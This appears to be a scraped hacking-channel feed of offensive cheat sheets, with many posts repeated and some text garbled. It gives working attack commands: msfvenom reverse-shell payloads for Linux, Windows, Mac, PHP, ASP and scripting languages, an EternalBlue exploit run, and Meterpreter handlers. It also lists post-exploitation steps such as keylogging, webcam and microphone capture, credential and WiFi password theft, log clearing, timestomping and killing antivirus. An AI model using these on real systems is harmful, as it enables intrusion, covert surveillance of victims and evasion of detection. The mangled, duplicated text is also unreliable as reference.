โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Mobile Application Test Notes (Android)
Prepping the application
(After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android
Creating an emulator and installing the application
+ Create a virtual device:
- android avd
+ Start the emulator:
- emulator โavd testavd
+ Install the application:
- adb install <path of the .apk file>
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Start the emulator and proxy:
- emulator โavd testavd โhttp-proxy http://localhost:8080
+ Download and install burp certificate (.crt) onto the emulator using the push shell command.
Notes:
+ Application file type - x.apk
Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp
http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Mobile Application Test Notes (Android)
Prepping the application
(After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android
Creating an emulator and installing the application
+ Create a virtual device:
- android avd
+ Start the emulator:
- emulator โavd testavd
+ Install the application:
- adb install <path of the .apk file>
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Start the emulator and proxy:
- emulator โavd testavd โhttp-proxy http://localhost:8080
+ Download and install burp certificate (.crt) onto the emulator using the push shell command.
Notes:
+ Application file type - x.apk
Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp
http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Android Developers Blog
Changes to Trusted Certificate Authorities in Android Nougat
News and insights on the Android platform, developer tools, and events.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM databaseโ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆFOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see โmsfvenom โhelp-formatsโ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler โ โmsfconsole -L -r โ
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆFOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see โmsfvenom โhelp-formatsโ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler โ โmsfconsole -L -r โ
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM databaseโ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMaterpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMaterpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Bypassing Application Whitelisting By Using dnx.exe.pdf
226.5 KB
The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe
Bypassing Application Whitelisting By Using dnx.exe
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHelpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHelpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Freebuf
ๅพ่งฃMeterpreterๅฎ็ฐ็ฝ็ป็ฉฟ้็ๆนๆณ - FreeBuf็ฝ็ปๅฎๅ
จ่กไธ้จๆท
ๆฌๆๆไปฌๅฐ้่ฟ็คบไพๅๆๆปๅป่
ๆฏๅฆไฝ่ฟ็จๅ็งๆนๆณ่ฟ่ก็ฝ็ป็ฉฟ้็ใ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCrack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor โ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCrack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
